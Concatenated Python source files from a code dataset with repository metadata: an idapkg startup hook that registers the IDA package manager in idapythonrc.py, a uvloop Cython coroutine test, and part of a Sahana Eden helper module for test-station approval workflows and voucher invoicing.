from .logger import getLogger
from .package import LocalPackage
from .virtualenv_utils import prepare_virtualenv
log = getLogger(__name__)
RC = b"""
_idapkg_basedir = os.path.expanduser(os.path.join('~', 'idapkg'))
def init_idapkg(basedir):
"idapythonrc.py is a perfect place to initialize IDAUSR variable"
import os
import sys
import json
def usage():
print("idapkg is not installed or corrupted.")
print("please use the installation script below:")
print("https://github.com/Jinmo/idapkg")
config = os.path.join(basedir, 'config.json')
if os.path.isfile(config):
try:
with open(config, 'rb') as f:
j = json.load(f)
packages_path = j['path']['packages']
idapkg_path = os.path.join(packages_path, 'idapkg')
assert os.path.isdir(idapkg_path), "idapkg package does not exist"
# idapkg doesn't have any plugins. just load to path.
# XXX: replace this with some package-related routines
sys.path.append(idapkg_path)
from pkg.main import init_environment
init_environment()
except Exception:
import traceback
traceback.print_exc()
return usage()
else:
return usage()
init_idapkg(_idapkg_basedir)
del init_idapkg, _idapkg_basedir
"""
SEP = b'\n# idapkg version: ', b'# idapkg end\n'
def update_pythonrc():
rcpath = os.path.join(ida_diskio.get_user_idadir(), "idapythonrc.py")
sep_with_ver = SEP[0] + __version__.encode()
payload = b'%s\n%s\n%s' % (sep_with_ver, RC.strip(), SEP[1])
if os.path.isfile(rcpath):
with open(rcpath, 'rb') as f:
py = f.read()
if payload in py:
return
if all(x in py for x in SEP):
py = py.split(SEP[0], 1)
py = py[0] + py[1].split(SEP[1], 1)[1]
py = payload + py
log.info('Updating idapkg into idapythonrc.py.')
else:
py = payload
log.info('Added idapkg into idapythonrc.py. Will work after restarting!')
with open(rcpath, 'wb') as f:
f.write(py)
def init_environment(_load=True):
"""
Must be called from idapythonrc.py. I didn't test other cases.
"""
log.info("idapkg version %s" % __version__)
update_pythonrc()
prepare_virtualenv(g['path']['virtualenv'])
ifred = LocalPackage.by_name('ifred')
if ifred:
ifred.load()
from . import actions
for pkg in LocalPackage.all():
pkg.populate_env()
| 27.864583
| 81
| 0.608224
|
bc6555ffc0e998f2ec4e2961a4b8599793b282da
| 1,119
|
py
|
Python
|
tests/test_cython.py
|
Psycojoker/uvloop
|
03487c80a508ea92e66f976fa196e64514894205
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
tests/test_cython.py
|
Psycojoker/uvloop
|
03487c80a508ea92e66f976fa196e64514894205
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
tests/test_cython.py
|
Psycojoker/uvloop
|
03487c80a508ea92e66f976fa196e64514894205
|
[
"Apache-2.0",
"MIT"
] | 1
|
2019-09-24T18:25:43.000Z
|
2019-09-24T18:25:43.000Z
|
import asyncio
from uvloop._testbase import UVTestCase
class TestCythonIntegration(UVTestCase):
def test_cython_coro_is_coroutine(self):
from uvloop.loop import _test_coroutine_1
from asyncio.coroutines import _format_coroutine
coro = _test_coroutine_1()
self.assertTrue(
_format_coroutine(coro).startswith('_test_coroutine_1() done'))
self.assertEqual(_test_coroutine_1.__qualname__, '_test_coroutine_1')
self.assertEqual(_test_coroutine_1.__name__, '_test_coroutine_1')
self.assertTrue(asyncio.iscoroutine(coro))
fut = asyncio.ensure_future(coro, loop=self.loop)
self.assertTrue(isinstance(fut, asyncio.Future))
self.assertTrue(isinstance(fut, asyncio.Task))
fut.cancel()
with self.assertRaises(asyncio.CancelledError):
self.loop.run_until_complete(fut)
try:
_format_coroutine(coro) # This line checks against Cython segfault
except TypeError:
# TODO: Fix Cython to not reset __name__/__qualname__ to None
pass
coro.close()
| 33.909091
| 79
| 0.691689
|
c9076aae20a1309d440fe81fd01cd897728b6782
| 87,564
|
py
|
Python
|
modules/templates/RLPPTM/helpers.py
|
armin11/eden
|
70834282bc1dee7d1bc00ea617c384755f3bf806
|
[
"MIT"
] | 1
|
2021-08-11T13:52:57.000Z
|
2021-08-11T13:52:57.000Z
|
modules/templates/RLPPTM/helpers.py
|
armin11/eden
|
70834282bc1dee7d1bc00ea617c384755f3bf806
|
[
"MIT"
] | 1
|
2021-07-19T05:05:48.000Z
|
2021-07-19T05:05:48.000Z
|
modules/templates/RLPPTM/helpers.py
|
armin11/eden
|
70834282bc1dee7d1bc00ea617c384755f3bf806
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Helper functions and classes for RLPPTM template
@license: MIT
"""
import json
from gluon import current, Field, URL, \
CRYPT, IS_EMAIL, IS_IN_SET, IS_LOWER, IS_NOT_IN_DB, \
SQLFORM, A, DIV, H4, H5, I, INPUT, LI, P, SPAN, TABLE, TD, TH, TR, UL
from s3 import ICON, IS_FLOAT_AMOUNT, JSONERRORS, S3DateTime, \
S3Method, S3Represent, s3_fullname, s3_mark_required, s3_str
from s3db.pr import pr_PersonRepresentContact, pr_default_realms
# =============================================================================
def get_role_realms(role):
"""
Get all realms for which a role has been assigned
@param role: the role ID or role UUID
@returns: list of pe_ids the current user has the role for,
None if the role is assigned site-wide, or an
empty list if the user does not have the role, or
no realm for the role
"""
db = current.db
auth = current.auth
s3db = current.s3db
if isinstance(role, str):
gtable = auth.settings.table_group
query = (gtable.uuid == role) & \
(gtable.deleted == False)
row = db(query).select(gtable.id,
cache = s3db.cache,
limitby = (0, 1),
).first()
role_id = row.id if row else None
else:
role_id = role
role_realms = []
user = auth.user
if user:
role_realms = user.realms.get(role_id, role_realms)
return role_realms
# =============================================================================
def get_managed_facilities(role="ORG_ADMIN", public_only=True):
"""
Get test stations managed by the current user
@param role: the user role to consider
@param public_only: only include sites with PUBLIC=Y tag
@returns: list of site_ids
"""
s3db = current.s3db
ftable = s3db.org_facility
query = (ftable.obsolete == False) & \
(ftable.deleted == False)
realms = get_role_realms(role)
if realms:
query = (ftable.realm_entity.belongs(realms)) & query
elif realms is not None:
# User does not have the required role, or at least not for any realms
return realms
if public_only:
ttable = s3db.org_site_tag
join = ttable.on((ttable.site_id == ftable.site_id) & \
(ttable.tag == "PUBLIC") & \
(ttable.deleted == False))
query &= (ttable.value == "Y")
else:
join = None
sites = current.db(query).select(ftable.site_id,
cache = s3db.cache,
join = join,
)
return [s.site_id for s in sites]
# =============================================================================
def get_org_accounts(organisation_id):
"""
Get all user accounts linked to an organisation
@param organisation_id: the organisation ID
@returns: tuple (active, disabled, invited), each being
a list of user accounts (auth_user Rows)
"""
auth = current.auth
s3db = current.s3db
utable = auth.settings.table_user
oltable = s3db.org_organisation_user
pltable = s3db.pr_person_user
join = oltable.on((oltable.user_id == utable.id) & \
(oltable.deleted == False))
left = pltable.on((pltable.user_id == utable.id) & \
(pltable.deleted == False))
query = (oltable.organisation_id == organisation_id)
rows = current.db(query).select(utable.id,
utable.first_name,
utable.last_name,
utable.email,
utable.registration_key,
pltable.pe_id,
join = join,
left = left,
)
active, disabled, invited = [], [], []
for row in rows:
user = row[utable]
person_link = row.pr_person_user
if person_link.pe_id:
if user.registration_key:
disabled.append(user)
else:
active.append(user)
else:
invited.append(user)
return active, disabled, invited
# -----------------------------------------------------------------------------
def get_role_users(role_uid, pe_id=None, organisation_id=None):
"""
Look up users with a certain user role for a certain organisation
@param role_uid: the role UUID
@param pe_id: the pe_id of the organisation, or
@param organisation_id: the organisation_id
@returns: a dict {user_id: pe_id} of all active users with this
role for the organisation
"""
db = current.db
auth = current.auth
s3db = current.s3db
if not pe_id and organisation_id:
# Look up the realm pe_id from the organisation
otable = s3db.org_organisation
query = (otable.id == organisation_id) & \
(otable.deleted == False)
organisation = db(query).select(otable.pe_id,
limitby = (0, 1),
).first()
pe_id = organisation.pe_id if organisation else None
# Get all users with this realm as direct OU ancestor
from s3db.pr import pr_realm_users
users = pr_realm_users(pe_id) if pe_id else None
if users:
# Look up those among the realm users who have
# the role for either pe_id or for their default realm
gtable = auth.settings.table_group
mtable = auth.settings.table_membership
ltable = s3db.pr_person_user
utable = auth.settings.table_user
join = [mtable.on((mtable.user_id == ltable.user_id) & \
((mtable.pe_id == None) | (mtable.pe_id == pe_id)) & \
(mtable.deleted == False)),
gtable.on((gtable.id == mtable.group_id) & \
(gtable.uuid == role_uid)),
# Only verified+active accounts:
utable.on((utable.id == mtable.user_id) & \
((utable.registration_key == None) | \
(utable.registration_key == "")))
]
query = (ltable.user_id.belongs(set(users.keys()))) & \
(ltable.deleted == False)
rows = db(query).select(ltable.user_id,
ltable.pe_id,
join = join,
)
users = {row.user_id: row.pe_id for row in rows}
return users if users else None
# -----------------------------------------------------------------------------
def get_role_emails(role_uid, pe_id=None, organisation_id=None):
"""
Look up the emails addresses of users with a certain user role
for a certain organisation
@param role_uid: the role UUID
@param pe_id: the pe_id of the organisation, or
@param organisation_id: the organisation_id
@returns: a list of email addresses
"""
contacts = None
users = get_role_users(role_uid,
pe_id = pe_id,
organisation_id = organisation_id,
)
if users:
# Look up their email addresses
ctable = current.s3db.pr_contact
query = (ctable.pe_id.belongs(set(users.values()))) & \
(ctable.contact_method == "EMAIL") & \
(ctable.deleted == False)
rows = current.db(query).select(ctable.value,
orderby = ~ctable.priority,
)
contacts = list(set(row.value for row in rows))
return contacts if contacts else None
# -----------------------------------------------------------------------------
def get_role_hrs(role_uid, pe_id=None, organisation_id=None):
"""
Look up the HR records of users with a certain user role
for a certain organisation
@param role_uid: the role UUID
@param pe_id: the pe_id of the organisation, or
@param organisation_id: the organisation_id
@returns: a list of hrm_human_resource IDs
"""
hr_ids = None
users = get_role_users(role_uid,
pe_id = pe_id,
organisation_id = organisation_id,
)
if users:
# Look up their HR records
s3db = current.s3db
ptable = s3db.pr_person
htable = s3db.hrm_human_resource
join = htable.on((htable.person_id == ptable.id) & \
(htable.deleted == False))
query = (ptable.pe_id.belongs(set(users.values()))) & \
(ptable.deleted == False)
rows = current.db(query).select(htable.id,
join = join,
)
hr_ids = list(set(row.id for row in rows))
return hr_ids if hr_ids else None
# -----------------------------------------------------------------------------
def assign_pending_invoices(billing_id, organisation_id=None, invoice_id=None):
"""
Auto-assign pending invoices in a billing to accountants,
taking into account their current workload
@param billing_id: the billing ID
@param organisation_id: the ID of the accountant organisation
@param invoice_id: assign only this invoice
"""
db = current.db
s3db = current.s3db
if not organisation_id:
# Look up the accounting organisation for the billing
btable = s3db.fin_voucher_billing
query = (btable.id == billing_id)
billing = db(query).select(btable.organisation_id,
limitby = (0, 1),
).first()
if not billing:
return
organisation_id = billing.organisation_id
if organisation_id:
# Look up the active accountants of the accountant org
accountants = get_role_hrs("PROGRAM_ACCOUNTANT",
organisation_id = organisation_id,
)
else:
accountants = None
# Query for any pending invoices of this billing cycle
itable = s3db.fin_voucher_invoice
if invoice_id:
query = (itable.id == invoice_id)
else:
query = (itable.billing_id == billing_id)
query &= (itable.status != "PAID") & (itable.deleted == False)
if accountants:
# Limit to invoices that have not yet been assigned to any
# of the accountants in charge:
query &= ((itable.human_resource_id == None) | \
(~(itable.human_resource_id.belongs(accountants))))
# Get the invoices
invoices = db(query).select(itable.id,
itable.human_resource_id,
)
if not invoices:
return
# Look up the number of pending invoices assigned to each
# accountant, to get a measure for their current workload
workload = {hr_id: 0 for hr_id in accountants}
query = (itable.status != "PAID") & \
(itable.human_resource_id.belongs(accountants)) & \
(itable.deleted == False)
num_assigned = itable.id.count()
rows = db(query).select(itable.human_resource_id,
num_assigned,
groupby = itable.human_resource_id,
)
for row in rows:
workload[row[itable.human_resource_id]] = row[num_assigned]
# Re-assign invoices
# - try to distribute workload evenly among the accountants
for invoice in invoices:
hr_id, num = min(workload.items(), key=lambda item: item[1])
invoice.update_record(human_resource_id = hr_id)
workload[hr_id] = num + 1
elif not invoice_id:
# Unassign all pending invoices
db(query).update(human_resource_id = None)
# -----------------------------------------------------------------------------
def check_invoice_integrity(row):
"""
Rheader-helper to check and report invoice integrity
@param row: the invoice record
@returns: integrity check result
"""
billing = current.s3db.fin_VoucherBilling(row.billing_id)
try:
checked = billing.check_invoice(row.id)
except ValueError:
checked = False
T = current.T
if checked:
return SPAN(T("Ok"),
I(_class="fa fa-check"),
_class="record-integrity-ok",
)
else:
current.response.error = T("This invoice may be invalid - please contact the administrator")
return SPAN(T("Failed"),
I(_class="fa fa-exclamation-triangle"),
_class="record-integrity-broken",
)
# -----------------------------------------------------------------------------
def get_stats_projects():
"""
Find all projects the current user can report test results, i.e.
- projects marked as STATS=Y where
- the current user has the VOUCHER_PROVIDER role for a partner organisation
@status: obsolete, test results shall be reported for all projects
"""
permitted_realms = current.auth.permission.permitted_realms
realms = permitted_realms("disease_case_diagnostics",
method = "create",
c = "disease",
f = "case_diagnostics",
)
if realms is not None and not realms:
return []
s3db = current.s3db
otable = s3db.org_organisation
ltable = s3db.project_organisation
ttable = s3db.project_project_tag
oquery = otable.deleted == False
if realms:
oquery = otable.pe_id.belongs(realms) & oquery
join = [ltable.on((ltable.project_id == ttable.project_id) & \
(ltable.deleted == False)),
otable.on((otable.id == ltable.organisation_id) & oquery),
]
query = (ttable.tag == "STATS") & \
(ttable.value == "Y") & \
(ttable.deleted == False)
rows = current.db(query).select(ttable.project_id,
cache = s3db.cache,
join = join,
groupby = ttable.project_id,
)
return [row.project_id for row in rows]
# -----------------------------------------------------------------------------
def can_cancel_debit(debit):
"""
Check whether the current user is entitled to cancel a certain
voucher debit:
* User must have the VOUCHER_PROVIDER role for the organisation
that originally accepted the voucher (not even ADMIN-role can
override this requirement)
@param debit: the debit (Row, must contain the debit pe_id)
@returns: True|False
"""
auth = current.auth
user = auth.user
if user:
# Look up the role ID
gtable = auth.settings.table_group
query = (gtable.uuid == "VOUCHER_PROVIDER")
role = current.db(query).select(gtable.id,
cache = current.s3db.cache,
limitby = (0, 1),
).first()
if not role:
return False
# Get the realms they have this role for
realms = user.realms
if role.id in realms:
role_realms = realms.get(role.id)
else:
# They don't have the role at all
return False
if not role_realms:
# User has a site-wide VOUCHER_PROVIDER role, however
# for cancellation of debits they must be affiliated
# with the debit owner organisation
role_realms = pr_default_realms(user["pe_id"])
return debit.pe_id in role_realms
else:
# No user
return False
# -----------------------------------------------------------------------------
def configure_binary_tags(resource, tag_components):
"""
Configure representation of binary tags
@param resource: the S3Resource
@param tag_components: tuple|list of filtered tag component aliases
"""
T = current.T
binary_tag_opts = {"Y": T("Yes"), "N": T("No")}
for cname in tag_components:
component = resource.components.get(cname)
if component:
ctable = component.table
field = ctable.value
field.default = "N"
field.requires = IS_IN_SET(binary_tag_opts, zero=None)
field.represent = lambda v, row=None: binary_tag_opts.get(v, "-")
# -----------------------------------------------------------------------------
def workflow_tag_represent(options):
"""
Color-coded and icon-supported representation of
facility approval workflow tags
@param options: the tag options as dict {value: label}
"""
icons = {"REVISE": "fa fa-exclamation-triangle",
"REVIEW": "fa fa-hourglass",
"APPROVED": "fa fa-check",
"N": "fa fa-minus-circle",
"Y": "fa fa-check",
}
css_classes = {"REVISE": "workflow-red",
"REVIEW": "workflow-amber",
"APPROVED": "workflow-green",
"N": "workflow-red",
"Y": "workflow-green",
}
def represent(value, row=None):
label = DIV(_class="approve-workflow")
color = css_classes.get(value)
if color:
label.add_class(color)
icon = icons.get(value)
if icon:
label.append(I(_class=icon))
label.append(options.get(value, "-"))
return label
return represent
# -----------------------------------------------------------------------------
def configure_workflow_tags(resource, role="applicant", record_id=None):
"""
Configure facility approval workflow tags
@param resource: the org_facility resource
@param role: the user's role in the workflow (applicant|approver)
@param record_id: the facility record ID
@returns: the list of visible workflow tags [(label, selector)]
"""
T = current.T
components = resource.components
visible_tags = []
# Configure STATUS tag
status_tag_opts = {"REVISE": T("Completion/Adjustment Required"),
"READY": T("Ready for Review"),
"REVIEW": T("Review Pending"),
"APPROVED": T("Approved##actionable"),
}
selectable = None
status_visible = False
review_tags_visible = False
if role == "applicant" and record_id:
# Check current status
db = current.db
s3db = current.s3db
ftable = s3db.org_facility
ttable = s3db.org_site_tag
join = ftable.on((ftable.site_id == ttable.site_id) & \
(ftable.id == record_id))
query = (ttable.tag == "STATUS") & (ttable.deleted == False)
row = db(query).select(ttable.value, join=join, limitby=(0, 1)).first()
if row:
if row.value == "REVISE":
review_tags_visible = True
selectable = (row.value, "READY")
elif row.value == "REVIEW":
review_tags_visible = True
status_visible = True
component = components.get("status")
if component:
ctable = component.table
field = ctable.value
field.default = "REVISE"
field.readable = status_visible
if status_visible:
if selectable:
selectable_statuses = [(status, status_tag_opts[status])
for status in selectable]
field.requires = IS_IN_SET(selectable_statuses, zero=None)
field.writable = True
else:
field.writable = False
visible_tags.append((T("Processing Status"), "status.value"))
field.represent = workflow_tag_represent(status_tag_opts)
# Configure review tags
review_tag_opts = (("REVISE", T("Completion/Adjustment Required")),
("REVIEW", T("Review Pending")),
("APPROVED", T("Approved##actionable")),
)
selectable = review_tag_opts if role == "approver" else None
review_tags = (("mpav", T("MPAV Qualification")),
("hygiene", T("Hygiene Plan")),
("layout", T("Facility Layout Plan")),
)
for cname, label in review_tags:
component = components.get(cname)
if component:
ctable = component.table
field = ctable.value
field.default = "REVISE"
if selectable:
field.requires = IS_IN_SET(selectable, zero=None, sort=False)
field.readable = field.writable = True
else:
field.readable = review_tags_visible
field.writable = False
if field.readable:
visible_tags.append((label, "%s.value" % cname))
field.represent = workflow_tag_represent(dict(review_tag_opts))
# Configure PUBLIC tag
binary_tag_opts = {"Y": T("Yes"),
"N": T("No"),
}
selectable = binary_tag_opts if role == "approver" else None
component = resource.components.get("public")
if component:
ctable = component.table
field = ctable.value
field.default = "N"
if selectable:
field.requires = IS_IN_SET(selectable, zero=None)
field.writable = True
else:
field.requires = IS_IN_SET(binary_tag_opts, zero=None)
field.writable = False
field.represent = workflow_tag_represent(binary_tag_opts)
visible_tags.append((T("In Public Registry"), "public.value"))
visible_tags.append("site_details.authorisation_advice")
return visible_tags
# -----------------------------------------------------------------------------
def facility_approval_workflow(site_id):
"""
Update facility approval workflow tags
@param site_id: the site ID
"""
db = current.db
s3db = current.s3db
workflow = ("STATUS", "MPAV", "HYGIENE", "LAYOUT", "PUBLIC")
review = ("MPAV", "HYGIENE", "LAYOUT")
# Get all tags for site
ttable = s3db.org_site_tag
query = (ttable.site_id == site_id) & \
(ttable.tag.belongs(workflow)) & \
(ttable.deleted == False)
rows = db(query).select(ttable.id,
ttable.tag,
ttable.value,
)
tags = {row.tag: row.value for row in rows}
if any(k not in tags for k in workflow):
ftable = s3db.org_facility
facility = db(ftable.site_id == site_id).select(ftable.id,
limitby = (0, 1),
).first()
if facility:
add_facility_default_tags(facility)
facility_approval_workflow(site_id)
update = {}
notify = False
status = tags.get("STATUS")
if status == "REVISE":
if all(tags[k] == "APPROVED" for k in review):
update["PUBLIC"] = "Y"
update["STATUS"] = "APPROVED"
notify = True
elif any(tags[k] == "REVIEW" for k in review):
update["PUBLIC"] = "N"
update["STATUS"] = "REVIEW"
else:
update["PUBLIC"] = "N"
# Keep status REVISE
elif status == "READY":
update["PUBLIC"] = "N"
if all(tags[k] == "APPROVED" for k in review):
for k in review:
update[k] = "REVIEW"
else:
for k in review:
if tags[k] == "REVISE":
update[k] = "REVIEW"
update["STATUS"] = "REVIEW"
elif status == "REVIEW":
if all(tags[k] == "APPROVED" for k in review):
update["PUBLIC"] = "Y"
update["STATUS"] = "APPROVED"
notify = True
elif any(tags[k] == "REVIEW" for k in review):
update["PUBLIC"] = "N"
# Keep status REVIEW
elif any(tags[k] == "REVISE" for k in review):
update["PUBLIC"] = "N"
update["STATUS"] = "REVISE"
notify = True
elif status == "APPROVED":
if any(tags[k] == "REVIEW" for k in review):
update["PUBLIC"] = "N"
update["STATUS"] = "REVIEW"
elif any(tags[k] == "REVISE" for k in review):
update["PUBLIC"] = "N"
update["STATUS"] = "REVISE"
notify = True
for row in rows:
key = row.tag
if key in update:
row.update_record(value=update[key])
T = current.T
public = update.get("PUBLIC")
if public and public != tags["PUBLIC"]:
if public == "Y":
msg = T("Facility added to public registry")
else:
msg = T("Facility removed from public registry pending review")
current.response.information = msg
# Send Notifications
if notify:
tags.update(update)
msg = facility_review_notification(site_id, tags)
if msg:
current.response.warning = \
T("Test station could not be notified: %(error)s") % {"error": msg}
else:
current.response.flash = \
T("Test station notified")
# -----------------------------------------------------------------------------
def facility_review_notification(site_id, tags):
"""
Notify the OrgAdmin of a test station about the status of the review
@param site_id: the test facility site ID
@param tags: the current workflow tags
@returns: error message on error, else None
"""
db = current.db
s3db = current.s3db
# Lookup the facility
ftable = s3db.org_facility
query = (ftable.site_id == site_id) & \
(ftable.deleted == False)
facility = db(query).select(ftable.id,
ftable.name,
ftable.organisation_id,
limitby = (0, 1),
).first()
if not facility:
return "Facility not found"
organisation_id = facility.organisation_id
if not organisation_id:
return "Organisation not found"
# Find the OrgAdmin email addresses
email = get_role_emails("ORG_ADMIN",
organisation_id = organisation_id,
)
if not email:
return "No Organisation Administrator found"
# Data for the notification email
data = {"name": facility.name,
"url": URL(c = "org",
f = "organisation",
args = [organisation_id, "facility", facility.id],
host = True,
),
}
status = tags.get("STATUS")
if status == "REVISE":
template = "FacilityReview"
# Add advice
dtable = s3db.org_site_details
query = (dtable.site_id == site_id) & \
(dtable.deleted == False)
details = db(query).select(dtable.authorisation_advice,
limitby = (0, 1),
).first()
if details and details.authorisation_advice:
data["advice"] = details.authorisation_advice
# Add explanations for relevant requirements
review = (("MPAV", "FacilityMPAVRequirements"),
("HYGIENE", "FacilityHygienePlanRequirements"),
("LAYOUT", "FacilityLayoutRequirements"),
)
ctable = s3db.cms_post
ltable = s3db.cms_post_module
join = ltable.on((ltable.post_id == ctable.id) & \
(ltable.module == "org") & \
(ltable.resource == "facility") & \
(ltable.deleted == False))
explanations = []
for tag, requirements in review:
if tags.get(tag) == "REVISE":
query = (ctable.name == requirements) & \
(ctable.deleted == False)
row = db(query).select(ctable.body,
join = join,
limitby = (0, 1),
).first()
if row:
explanations.append(row.body)
data["explanations"] = "\n\n".join(explanations) if explanations else "-"
elif status == "APPROVED":
template = "FacilityApproved"
else:
# No notifications for this status
return "invalid status"
# Lookup email address of current user
from .notifications import CMSNotifications
auth = current.auth
if auth.user:
cc = CMSNotifications.lookup_contact(auth.user.pe_id)
else:
cc = None
# Send CMS Notification FacilityReview
return CMSNotifications.send(email,
template,
data,
module = "org",
resource = "facility",
cc = cc,
)
# -----------------------------------------------------------------------------
def add_organisation_default_tags(organisation_id):
"""
Add default tags to a new organisation
@param organisation_id: the organisation record ID
"""
db = current.db
s3db = current.s3db
# Add default tags
otable = s3db.org_organisation
ttable = s3db.org_organisation_tag
dttable = ttable.with_alias("delivery")
ittable = ttable.with_alias("orgid")
left = [dttable.on((dttable.organisation_id == otable.id) & \
(dttable.tag == "DELIVERY") & \
(dttable.deleted == False)),
ittable.on((ittable.organisation_id == otable.id) & \
(ittable.tag == "OrgID") & \
(ittable.deleted == False)),
]
query = (otable.id == organisation_id)
row = db(query).select(otable.id,
otable.uuid,
dttable.id,
ittable.id,
left = left,
limitby = (0, 1),
).first()
if row:
org = row.org_organisation
# Add DELIVERY-tag
dtag = row.delivery
if not dtag.id:
ttable.insert(organisation_id = org.id,
tag = "DELIVERY",
value = "DIRECT",
)
# Add OrgID-tag
itag = row.orgid
if not itag.id:
try:
uid = int(org.uuid[9:14], 16)
except (TypeError, ValueError):
import uuid
uid = int(uuid.uuid4().urn[9:14], 16)
value = "%06d%04d" % (uid, org.id)
ttable.insert(organisation_id = org.id,
tag = "OrgID",
value = value,
)
# -----------------------------------------------------------------------------
def add_facility_default_tags(facility_id, approve=False):
"""
Add default tags to a new facility
@param facility_id: the facility record ID
@param approve: whether called from approval-workflow
"""
db = current.db
s3db = current.s3db
ftable = s3db.org_facility
ttable = s3db.org_site_tag
workflow = ("PUBLIC", "MPAV", "HYGIENE", "LAYOUT", "STATUS")
left = ttable.on((ttable.site_id == ftable.site_id) & \
(ttable.tag.belongs(workflow)) & \
(ttable.deleted == False))
query = (ftable.id == facility_id)
rows = db(query).select(ftable.site_id,
ttable.id,
ttable.tag,
ttable.value,
left = left,
)
if not rows:
return
else:
site_id = rows.first().org_facility.site_id
existing = {row.org_site_tag.tag: row.org_site_tag.value
for row in rows if row.org_site_tag.id}
public = existing.get("PUBLIC") == "Y" or approve
review = ("MPAV", "HYGIENE", "LAYOUT")
for tag in workflow:
if tag in existing:
continue
elif tag == "PUBLIC":
default = "Y" if public else "N"
elif tag == "STATUS":
if any(existing[t] == "REVISE" for t in review):
default = "REVISE"
elif any(existing[t] == "REVIEW" for t in review):
default = "REVIEW"
else:
default = "APPROVED" if public else "REVIEW"
else:
default = "APPROVED" if public else "REVISE"
ttable.insert(site_id = site_id,
tag = tag,
value = default,
)
existing[tag] = default
# -----------------------------------------------------------------------------
def set_facility_code(facility_id):
"""
Generate and set a unique facility code
@param facility_id: the facility ID
@returns: the facility code
"""
db = current.db
s3db = current.s3db
table = s3db.org_facility
query = (table.id == facility_id)
facility = db(query).select(table.id,
table.uuid,
table.code,
limitby = (0, 1),
).first()
if not facility or facility.code:
return None
try:
uid = int(facility.uuid[9:14], 16) % 1000000
except (TypeError, ValueError):
import uuid
uid = int(uuid.uuid4().urn[9:14], 16) % 1000000
# Generate code
import random
suffix = "".join(random.choice("ABCFGHKLNPRSTWX12456789") for _ in range(3))
code = "%06d-%s" % (uid, suffix)
facility.update_record(code=code)
return code
# -----------------------------------------------------------------------------
def applicable_org_types(organisation_id, group=None, represent=False):
"""
Look up organisation types by OrgGroup-tag
@param organisation_id: the record ID of an existing organisation
@param group: alternatively, the organisation group name
@param represent: include type labels in the result
@returns: a list of organisation type IDs, for filtering,
or a dict {type_id: label}, for selecting
"""
db = current.db
s3db = current.s3db
ttable = s3db.org_organisation_type_tag
if organisation_id:
# Look up the org groups of this record
gtable = s3db.org_group
mtable = s3db.org_group_membership
join = gtable.on(gtable.id == mtable.group_id)
query = (mtable.organisation_id == organisation_id) & \
(mtable.deleted == False)
rows = db(query).select(gtable.name, join=join)
groups = {row.name for row in rows}
q = (ttable.value.belongs(groups))
# Look up the org types the record is currently linked to
ltable = s3db.org_organisation_organisation_type
query = (ltable.organisation_id == organisation_id) & \
(ltable.deleted == False)
rows = db(query).select(ltable.organisation_type_id)
current_types = {row.organisation_type_id for row in rows}
elif group:
# Use group name as-is
q = (ttable.value == group)
# Look up all types tagged for this group
query = (ttable.tag == "OrgGroup") & q & \
(ttable.deleted == False)
rows = db(query).select(ttable.organisation_type_id,
cache = s3db.cache,
)
type_ids = {row.organisation_type_id for row in rows}
if organisation_id:
# Add the org types the record is currently linked to
type_ids |= current_types
if represent:
labels = ttable.organisation_type_id.represent
if hasattr(labels, "bulk"):
labels.bulk(list(type_ids))
output = {str(t): labels(t) for t in type_ids}
else:
output = list(type_ids)
return output
# =============================================================================
def facility_map_popup(record):
"""
Custom map popup for facilities
@param record: the facility record (Row)
@returns: the map popup contents as DIV
"""
db = current.db
s3db = current.s3db
T = current.T
table = s3db.org_facility
# Custom Map Popup
title = H4(record.name, _class="map-popup-title")
details = TABLE(_class="map-popup-details")
append = details.append
def formrow(label, value, represent=None):
return TR(TD("%s:" % label, _class="map-popup-label"),
TD(represent(value) if represent else value),
)
# Address
gtable = s3db.gis_location
query = (gtable.id == record.location_id)
location = db(query).select(gtable.addr_street,
gtable.addr_postcode,
gtable.L4,
gtable.L3,
limitby = (0, 1),
).first()
if location.addr_street:
append(formrow(gtable.addr_street.label, location.addr_street))
place = location.L4 or location.L3 or "?"
if location.addr_postcode:
place = "%s %s" % (location.addr_postcode, place)
append(formrow(T("Place"), place))
# Phone number
phone = record.phone1
if phone:
append(formrow(T("Phone"), phone))
# Email address (as hyperlink)
email = record.email
if email:
append(formrow(table.email.label, A(email, _href="mailto:%s" % email)))
# Opening Times
opening_times = record.opening_times
if opening_times:
append(formrow(table.opening_times.label, opening_times))
# Site services
stable = s3db.org_service
ltable = s3db.org_service_site
join = stable.on(stable.id == ltable.service_id)
query = (ltable.site_id == record.site_id) & \
(ltable.deleted == False)
rows = db(query).select(stable.name, join=join)
services = [row.name for row in rows]
if services:
append(formrow(T("Services"), ", ".join(services)))
# Comments
if record.comments:
append(formrow(table.comments.label,
record.comments,
represent = table.comments.represent,
))
return DIV(title, details, _class="map-popup")
# =============================================================================
class ServiceListRepresent(S3Represent):
always_list = True
def render_list(self, value, labels, show_link=True):
"""
Helper method to render list-type representations from
bulk()-results.
@param value: the list
@param labels: the labels as returned from bulk()
@param show_link: render references as links, should
be the same as used with bulk()
"""
show_link = show_link and self.show_link
values = [v for v in value if v is not None]
if not len(values):
return ""
if show_link:
labels_ = (labels[v] if v in labels else self.default for v in values)
else:
labels_ = sorted(s3_str(labels[v]) if v in labels else self.default for v in values)
html = UL(_class="service-list")
for label in labels_:
html.append(LI(label))
return html
# =============================================================================
class OrganisationRepresent(S3Represent):
"""
Custom representation of organisations showing the organisation type
- relevant for facility approval
"""
def __init__(self, show_type=True, show_link=True):
super(OrganisationRepresent, self).__init__(lookup = "org_organisation",
fields = ["name",],
show_link = show_link,
)
self.show_type = show_type
self.org_types = {}
self.type_names = {}
# -------------------------------------------------------------------------
def lookup_rows(self, key, values, fields=None):
"""
Custom lookup method for organisation rows, does a
left join with the parent organisation. Parameters
key and fields are not used, but are kept for API
compatibility reasons.
@param values: the organisation IDs
"""
db = current.db
s3db = current.s3db
otable = s3db.org_organisation
count = len(values)
if count == 1:
query = (otable.id == values[0])
else:
query = (otable.id.belongs(values))
rows = db(query).select(otable.id,
otable.name,
limitby = (0, count),
)
if self.show_type:
ltable = s3db.org_organisation_organisation_type
if count == 1:
query = (ltable.organisation_id == values[0])
else:
query = (ltable.organisation_id.belongs(values))
query &= (ltable.deleted == False)
types = db(query).select(ltable.organisation_id,
ltable.organisation_type_id,
)
all_types = set()
org_types = self.org_types = {}
for t in types:
type_id = t.organisation_type_id
all_types.add(type_id)
organisation_id = t.organisation_id
if organisation_id not in org_types:
org_types[organisation_id] = {type_id}
else:
org_types[organisation_id].add(type_id)
if all_types:
ttable = s3db.org_organisation_type
